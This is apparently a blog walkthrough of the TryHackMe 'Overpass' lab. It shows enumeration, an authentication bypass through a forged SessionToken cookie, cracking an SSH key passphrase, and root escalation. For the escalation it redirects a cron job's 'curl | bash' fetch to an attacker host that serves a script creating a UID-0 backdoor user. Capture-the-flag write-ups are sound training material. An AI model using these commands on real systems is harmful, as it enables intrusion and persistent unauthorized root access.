OverPass – TryHackMe Walkthrough

featured Anonhack.in Walkthrough hacking

In this walkthrough, we’ll be tackling the Overpass room on TryHackMe. This room is a realistic web application challenge that includes a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path. Let’s get started!

Machine Details:
  • OS: Linux
  • Difficulty: Easy
  • Skills Required: Web Enumeration, SSH, Privilege Escalation

Step 1: Initial Reconnaissance with Nmap

Start by scanning the target machine using Nmap to identify open ports and services:

nmap -p- <target-ip>

The scan reveals the following ports:

  • Port 22: SSH
  • Port 80: HTTP

The HTTP server is a Go server but doesn’t appear to have obvious vulnerabilities. This sets the stage for further enumeration.


Step 2: Web Enumeration to Discover Hidden Directories

Navigate to the web server on port 80, where you’ll find a simple webpage mentioning a project called “Overpass.” Next, run a directory brute-force scan using Gobuster:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/directory-list-2.3-medium.txt

This scan will reveal the /admin directory, which contains an admin login page.

Finding the Admin Login

Upon inspecting the login page, you’ll realize that conventional login attempts won’t work. The source code reveals two interesting files: login.js and cookie.js. The cookie.js file has a vulnerability where the SessionToken cookie is not validated properly.

By using a browser extension like Cookie Editor, you can add a SessionToken with a random value, which allows you to bypass authentication and access the admin panel. Inside, you’ll find an SSH private key for a user named James.


Step 3: Cracking the SSH Key Passphrase

The SSH key is protected with a passphrase, which you can crack using John the Ripper:

  1. Convert the key to a format John can read:

    ssh2john privatesshkeyfile > overpass.hash
  2. Crack the passphrase using John:
    john overpass.hash --wordlist=/usr/share/wordlists/rockyou.txt

After successfully cracking the passphrase “james13“, login to the ssh:

ssh -i <privatesshkeyfilename> james@<target-ip

Once inside, you’ll find the first flag in the user.txt file.

Bonus: Decoding James’s Hidden Password

In James’s home directory, you’ll find a hidden file named .overpass, which contains his SSH password encoded with ROT13. Decoding it gives you the password:

Step 4: Privilege Escalation to Root

Now, it’s time to escalate privileges. After checking SUID and running sudo -l, you’ll decide to use LinPEAS to perform a thorough system enumeration.

  1. Host a Python server on your attacking machine:
    python3 -m http.server 8080
  2. Download and execute LinPEAS on the target machine:
    wget <your-ip>/linpeas.sh
    chmod +x linpeas.sh
    ./linpeas.sh

    LinPEAS reveals a cron job running every minute:
    * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

To exploit this, modify the /etc/hosts file to redirect overpass.thm to your attacking machine:

vim /etc/hosts
<yourmachine'sip> overpass.thm

Now, host a malicious buildscript.sh on your Python server:

useradd -ou 0 -g 0 newroot
echo "newroot:password" | chpasswd

Once the cron job runs, it will download and execute your script, creating a new root user. Log in with the new user and grab the root flag from the /root directory.